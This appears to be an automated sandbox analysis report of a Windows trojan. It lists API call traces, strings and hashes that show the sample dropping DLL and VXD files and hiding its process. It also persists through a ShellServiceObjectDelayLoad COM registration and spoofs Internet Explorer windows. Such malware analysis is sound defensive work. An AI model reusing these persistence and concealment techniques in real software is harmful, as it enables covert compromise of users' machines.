                            • sprintf.CRTDLL(00428F60,%s\%s,00429080,kkq32.vxd,00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406E3A
                            • sprintf.CRTDLL(00408020,%s\%s,00429080,dnkkq.dll,00428F60,%s\%s,00429080,kkq32.vxd,00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406E53
                            • LoadCursorA.USER32(00000000,00007F00), ref: 00406E85
                            • LoadIconA.USER32(00000000,00007F03), ref: 00406E9A
                            • GetStockObject.GDI32(00000000), ref: 00406EA8
                            • RegisterClassA.USER32(00000003), ref: 00406EC9
                            • CreateWindowExA.USER32(00000000,QueenKarton,QueenKarton,00CA0000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00408020), ref: 00406EF3
                            • CreateMutexA.KERNEL32(00000000,00000000,QueenKarton_12,%s\%s,00429080,dnkkq.dll,00428F60,%s\%s,00429080,kkq32.vxd,00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406F12
                              • Part of subcall function 00402E06: GetVersion.KERNEL32 ref: 00402E22
                              • Part of subcall function 00402E06: GlobalMemoryStatus.KERNEL32(?), ref: 00402F9F
                              • Part of subcall function 00402E06: CloseHandle.KERNEL32(?), ref: 00403065
                            • GetVersion.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00429080,kkq32.dll,00418D50,00000000), ref: 00406F21
                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,00429080,kkq32.dll,00418D50,00000000), ref: 00406F32
                            • GetProcAddress.KERNEL32(00000000,RegisterServiceProcess), ref: 00406F3D
                            • GetCurrentProcessId.KERNEL32(00000000,RegisterServiceProcess,kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,00429080,kkq32.dll), ref: 00406F57
                            • CreateThread.KERNEL32(00000000,00000000,0040682B,00000000,00000000,?), ref: 00406F84
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,0040682B,00000000,00000000,?), ref: 00406F8A
                            • CreateThread.KERNEL32(00000000,00000000,004068B0,00000000,00000000,?), ref: 00406FA3
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,004068B0,00000000,00000000,?,00000000,00000000,00000000,0040682B,00000000,00000000,?), ref: 00406FA9
                            • SetTimer.USER32(00000001,000001F4,00000000,00000000), ref: 00406FBD
                            • TranslateMessage.USER32(?), ref: 00406FC8
                            • DispatchMessageA.USER32(?), ref: 00406FD7
                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00406FE6
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Handle$CloseCreatesprintf$MessageVersionrand$FileLoadModuleMutexProcessThread$AddressClassCopyCountCurrentCursorDirectoryDispatchExecExitGlobalIconMemoryNameObjectOpenProcRegisterStatusStockSystemTickTimerTranslateWindowexitsrand
                            • String ID: %s\%s$%s\%s.exe$2$3$QueenKarton$QueenKarton_12$RegisterServiceProcess$dnkkq.dll$kernel32.dll$kkq32.dll$kkq32.vxd
                            • API String ID: 607501245-2841515530
                            • Opcode ID: 47dc35882da9e6d4dfe293ecc6690f52e81bb2b6ce91e07ac91a2883a2b15265
                            • Instruction ID: b1e00ee85c63859ee3f052cf9651ba5d7fc827d99c5bd6e2bd8f21b679fb6b98
                            • Opcode Fuzzy Hash: 47dc35882da9e6d4dfe293ecc6690f52e81bb2b6ce91e07ac91a2883a2b15265
                            • Instruction Fuzzy Hash: E691C671F883286ADB10A7759C46FDD76A85B44704F5000BBB508FB2C2D6FC6D448BAE
                            Function 00403619 Relevance: 7.6, APIs: 5, Instructions: 58filememoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 60 403619-40364c CreateFileA 61 403664-403682 GetFileSize LocalAlloc 60->61 62 40364e-403652 60->62 63 403684-40368a 61->63 64 40368c-40368f 61->64 65 403654-403657 62->65 66 40365a-40365c 62->66 67 403692-4036ab ReadFile CloseHandle 63->67 64->67 65->66 66->61 68 4036ae-4036b2 66->68 67->68
                            APIs
                            • CreateFileA.KERNEL32(69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72,10624DD3), ref: 00403642
                            • GetFileSize.KERNEL32(00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72,10624DD3), ref: 00403667
                            • LocalAlloc.KERNEL32(00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72), ref: 00403674
                            • ReadFile.KERNEL32(00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000), ref: 0040369A
                            • CloseHandle.KERNEL32(00000000,00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080), ref: 004036A6
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$AllocCloseCreateHandleLocalReadSize
                            • String ID:
                            • API String ID: 2632956699-0
                            • Opcode ID: dd1227ad1f3452ee8fc35f5791aff0d34791abb0994a93554c87423cd4fa6a6f
                            • Instruction ID: fb77f57afc793f1fdbd914af7197191687e2a95eac13cef646675694312e246c
                            • Opcode Fuzzy Hash: dd1227ad1f3452ee8fc35f5791aff0d34791abb0994a93554c87423cd4fa6a6f
                            • Instruction Fuzzy Hash: 14116531A00208BAEB216E65CC06F9DB7A8DB00765F108576FA10BA2D1D67DAF018B5D
                            Function 00403F68 Relevance: 33.4, APIs: 9, Strings: 10, Instructions: 135fileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3), ref: 00403FA7
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3), ref: 00403FD4
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3), ref: 00404010
                            • sprintf.CRTDLL(?,%s\%s.dll,00429080,?,00000001,69D4CE72,10624DD3), ref: 00404048
                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000,?,%s\%s.dll,00429080,?,00000001,69D4CE72,10624DD3), ref: 00404063
                            • sprintf.CRTDLL(Onkcje32,00429080,?,40000000,00000000,00000000,00000002,00000000,00000000,?,%s\%s.dll,00429080,?,00000001,69D4CE72,10624DD3), ref: 00404086
                            • WriteFile.KERNEL32(?,0042AA84,00001A01,?,00000000,Onkcje32,00429080,?,40000000,00000000,00000000,00000002,00000000,00000000,?,%s\%s.dll), ref: 004040A4
                            • CloseHandle.KERNEL32(?,?,0042AA84,00001A01,?,00000000,Onkcje32,00429080,?,40000000,00000000,00000000,00000002,00000000,00000000,?), ref: 004040BB
                            • sprintf.CRTDLL(?,CLSID\%s\InProcServer32,{79FEACFF-FFCE-815E-A900-316290B5B738},?,?,0042AA84,00001A01,?,00000000,Onkcje32,00429080,?,40000000,00000000,00000000,00000002), ref: 004040D3
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: randsprintf$File$CloseCreateHandleWrite
                            • String ID: %s\%s.dll$2$3$Apartment$CLSID\%s\InProcServer32$Onkcje32$Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad$ThreadingModel$Web Event Logger${79FEACFF-FFCE-815E-A900-316290B5B738}
                            • API String ID: 4269242784-3154792301
                            • Opcode ID: 5b9226bc97ce31b3811795df607ed7bbed4fe58e3f2db61338cee063268ccacc
                            • Instruction ID: 8034dccab87c86b1e0d8b3b5755954c703eafec793446a3a0ea57bc4b4fc6a7a
                            • Opcode Fuzzy Hash: 5b9226bc97ce31b3811795df607ed7bbed4fe58e3f2db61338cee063268ccacc
                            • Instruction Fuzzy Hash: E7415771F482286AD7109769EC46BE97AAC8B49304F5400FBB908F72C1D6FC9E458F69
                            Function 00403CE9 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 197COMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe,00429080,?,00418D50,00000000), ref: 00403CFD
                            • memcpy.CRTDLL(-0042AA50,?,69D4CE72,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe,00429080,?,00418D50,00000000), ref: 00403D7A
                            • memset.CRTDLL(00406DCE,00000000,0000000C,-0042AA50,?,69D4CE72,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe,00429080), ref: 00403D8F
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403DF6
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403DFE
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403E1F
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403E27
                            • memcpy.CRTDLL(-0042AA4C,0042AA44,00000040,?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE), ref: 00403E52
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: rand$memcpy$memset
                            • String ID: +Z})
                            • API String ID: 1341957784-4018127762
                            • Opcode ID: 2b8c7437e1bd7430af5d83ecd7967c4870ae419bfa933bb167626543e718b489
                            • Instruction ID: df63eb390851271c68cbd719fcc6126871763b87c01c507511359465d0d2d2d2
                            • Opcode Fuzzy Hash: 2b8c7437e1bd7430af5d83ecd7967c4870ae419bfa933bb167626543e718b489
                            • Instruction Fuzzy Hash: A4719E31F042159BCB10CF69DD42A9E7BF5AF88354F584076E901B77A0D23CAA16CBAD
                            Function 00404148 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50registryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 69 404148-404190 RegCreateKeyExA 70 404193-404198 69->70 70->70 71 40419a-4041c2 RegSetValueExA RegCloseKey 70->71
                            APIs
                            • RegCreateKeyExA.ADVAPI32(69D4CE72,00000001,00000000,00000000,00000000,000F003F,00000000,00000000,69D4CE72,00000001,00006A14,{79FEACFF-FFCE-815E-A900-316290B5B738},?,?,?,004040F5), ref: 00404189
                            • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000001,00429080,69D4CE72,69D4CE72,00000001,00000000,00000000,00000000,000F003F,00000000,00000000,69D4CE72,00000001), ref: 004041AB
                            • RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00429080,69D4CE72,69D4CE72,00000001,00000000,00000000,00000000,000F003F,00000000,00000000,69D4CE72), ref: 004041B9
                            Strings
                            • {79FEACFF-FFCE-815E-A900-316290B5B738}, xrefs: 0040414D
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateValue
                            • String ID: {79FEACFF-FFCE-815E-A900-316290B5B738}
                            • API String ID: 1818849710-4250702572
                            • Opcode ID: 0b9791cc2bb803e0a6fddded9d2feb4d7971cdb144d1b8de1133cc46446009fc
                            • Instruction ID: 412fd7a6ac4860a679fa2010a2fd1b93dd732dea722ee027fa7473d1befc18ea
                            • Opcode Fuzzy Hash: 0b9791cc2bb803e0a6fddded9d2feb4d7971cdb144d1b8de1133cc46446009fc
                            • Instruction Fuzzy Hash: A7018472B00108BBEB114A95CC02FFEBA6AEF44764F250065FA00B71D1C6B1AE519754
                            Function 0040365E Relevance: 6.0, APIs: 4, Instructions: 30memoryfileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 72 40365e-403682 GetFileSize LocalAlloc 74 403684-40368a 72->74 75 40368c-40368f 72->75 76 403692-4036b2 ReadFile CloseHandle 74->76 75->76
                            APIs
                            • GetFileSize.KERNEL32(00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72,10624DD3), ref: 00403667
                            • LocalAlloc.KERNEL32(00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72), ref: 00403674
                            • ReadFile.KERNEL32(00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000), ref: 0040369A
                            • CloseHandle.KERNEL32(00000000,00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080), ref: 004036A6
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$AllocCloseHandleLocalReadSize
                            • String ID:
                            • API String ID: 341201350-0
                            • Opcode ID: 2fd491c6994b402e35e8b9e545411a472b55f40d1e3a5e6431fc85953c0e0c00
                            • Instruction ID: f40f052c398d65a7c82f7348c4b70b1bbd35af8546e58ac1d0fc8a8e918c22c0
                            • Opcode Fuzzy Hash: 2fd491c6994b402e35e8b9e545411a472b55f40d1e3a5e6431fc85953c0e0c00
                            • Instruction Fuzzy Hash: 4EF01C76F04504BAEB01ABA58C02BDD77789B04319F108467F604B62C1D27D6B119B6E
                            Function 00407980 Relevance: 4.5, APIs: 3, Instructions: 47stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 78 407980-40798f GetCommandLineA 79 407991-4079a4 strchr 78->79 80 4079b4-4079b9 78->80 81 4079a6-4079a9 79->81 82 4079cf-4079dc GetModuleHandleA call 406c29 79->82 83 4079c0 80->83 84 4079bb-4079be 80->84 85 4079ac-4079af 81->85 89 4079e1-4079e3 82->89 87 4079c3-4079c8 83->87 84->83 86 4079b3 84->86 90 4079b1 85->90 91 4079ab 85->91 86->80 87->82 92 4079ca-4079cd 87->92 90->82 91->85 92->82 93 4079c2 92->93 93->87
                            APIs
                            • GetCommandLineA.KERNEL32(?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407985
                            • strchr.CRTDLL(00000001,00000022,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407997
                            • GetModuleHandleA.KERNEL32(00000000,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 004079D1
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CommandHandleLineModulestrchr
                            • String ID:
                            • API String ID: 2139856000-0
                            • Opcode ID: a85f45691ed6f3240fb139f31581347a401a2e524d65f22663fdacfbc6ab9f8e
                            • Instruction ID: bd194e91918afd51b414fff694719a57869652e1cfdb10064340714cce8cfdd4
                            • Opcode Fuzzy Hash: a85f45691ed6f3240fb139f31581347a401a2e524d65f22663fdacfbc6ab9f8e
                            • Instruction Fuzzy Hash: 98F062D1E2C28124FF3162764C4673FAD8A9782754F281477E482F62C2E5BCAD52922B
                            Function 00401219 Relevance: 3.0, APIs: 2, Instructions: 36COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 94 401219 95 40121f-40127f __GetMainArgs call 407980 94->95 97 401284-401293 exit 95->97
                            APIs
                            • __GetMainArgs.CRTDLL(0042A020,0042A024,0042A028,00000000,00000000), ref: 00401262
                              • Part of subcall function 00407980: GetCommandLineA.KERNEL32(?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407985
                              • Part of subcall function 00407980: strchr.CRTDLL(00000001,00000022,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407997
                              • Part of subcall function 00407980: GetModuleHandleA.KERNEL32(00000000,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 004079D1
                            • exit.CRTDLL(00000000), ref: 0040128D
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ArgsCommandHandleLineMainModuleexitstrchr
                            • String ID:
                            • API String ID: 735354517-0
                            • Opcode ID: 4cf7b12bb1780c75f300c3ebf2e5b3677e9a846ab4eef9a36478d9a0a8233563
                            • Instruction ID: 1ee26eb31ace3a5089fdf6d32769bdd241f616d51084a453fd18da055c90a8b4
                            • Opcode Fuzzy Hash: 4cf7b12bb1780c75f300c3ebf2e5b3677e9a846ab4eef9a36478d9a0a8233563
                            • Instruction Fuzzy Hash: 52F09670F44300BBDB206F55DD03F167AA8EB08F1CF90002AFA44611D1D67D6420569F
                            Function 0040121F Relevance: 3.0, APIs: 2, Instructions: 35COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 98 40121f-40127f __GetMainArgs call 407980 100 401284-401293 exit 98->100
                            APIs
                            • __GetMainArgs.CRTDLL(0042A020,0042A024,0042A028,00000000,00000000), ref: 00401262
                              • Part of subcall function 00407980: GetCommandLineA.KERNEL32(?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407985
                              • Part of subcall function 00407980: strchr.CRTDLL(00000001,00000022,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407997
                              • Part of subcall function 00407980: GetModuleHandleA.KERNEL32(00000000,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 004079D1
                            • exit.CRTDLL(00000000), ref: 0040128D
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ArgsCommandHandleLineMainModuleexitstrchr
                            • String ID:
                            • API String ID: 735354517-0
                            • Opcode ID: 3b2f29dedebab105fe7e3300aa923db6c3c370c5ed425738ec8fc91bc5ecbfbb
                            • Instruction ID: 22fee5bca0d1ee63cc250ffe024ab50772efda8fe48dde45178863df2fdfff2b
                            • Opcode Fuzzy Hash: 3b2f29dedebab105fe7e3300aa923db6c3c370c5ed425738ec8fc91bc5ecbfbb
                            • Instruction Fuzzy Hash: BEF090B0F44300BBDA206F55AC03F1A7AA8EB08B1CFA0002AFA44611E1DA7D6420569F

                            Non-executed Functions

                            Function 00405133 Relevance: 65.0, APIs: 28, Strings: 9, Instructions: 238stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00405181
                            • lstrlenA.KERNEL32(?,?), ref: 00405195
                            • lstrlenA.KERNEL32(?,?,?), ref: 004051A6
                            • lstrlenA.KERNEL32(?,?,?,?), ref: 004051C4
                            • lstrlenA.KERNEL32(?,?,?,?,?), ref: 004051D5
                            • lstrlenA.KERNEL32(?,?,?,?,?,?), ref: 004051E6
                            • InterlockedIncrement.KERNEL32(0042C48C), ref: 00405218
                            • memset.CRTDLL(?,00000000,00000010,?,?,?,?,?,?), ref: 0040522E
                            • GetTickCount.KERNEL32 ref: 00405239
                            • srand.CRTDLL(00000000,?,00000000,00000010,?,?,?,?,?,?), ref: 0040523F
                              • Part of subcall function 0040429C: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004042D3
                            • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 0040526C
                            • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?), ref: 00405290
                            • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000104,?,?,?,?,?,?), ref: 004052D4
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$FreeLocal$CountEnvironmentExpandIncrementInterlockedOpenStringsTickmemsetsrand
                            • String ID: %s%u - Microsoft Internet Explorer$7O{M$D$IEFrame$MicroSoft-Corp$Path$Software\Microsoft\IE Setup\Setup$X-okRecv11$\Iexplore.exe
                            • API String ID: 2987844104-963083691
                            • Opcode ID: a4e079000a0a70f6da611676ee79104fcc8748fed5030838b847c3b90d393ccd
                            • Instruction ID: eaf183550e18aa99804e3b29fd782d62b91feccc71c8544a1a81296d936fe118
                            • Opcode Fuzzy Hash: a4e079000a0a70f6da611676ee79104fcc8748fed5030838b847c3b90d393ccd
                            • Instruction Fuzzy Hash: 8E91B471E092186BDF20EB65CC49BDEB779AF40308F1440F6E208B61D1DAB96EC58F59
                            Function 00405C09 Relevance: 59.7, APIs: 25, Strings: 9, Instructions: 230stringfilesleepCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00405C3C
                            • GetTickCount.KERNEL32 ref: 00405C54
                            • srand.CRTDLL(00000000,?), ref: 00405C5A
                            • InterlockedIncrement.KERNEL32(0042C48C), ref: 00405C69
                            • memset.CRTDLL(?,00000000,00000010,0042C48C,00000000,?), ref: 00405C7F
                              • Part of subcall function 0040429C: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004042D3
                            • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,00000000,?), ref: 00405CC2
                              • Part of subcall function 0040570C: GetTempPathA.KERNEL32(00000104,?), ref: 00405730
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,.htm), ref: 00405764
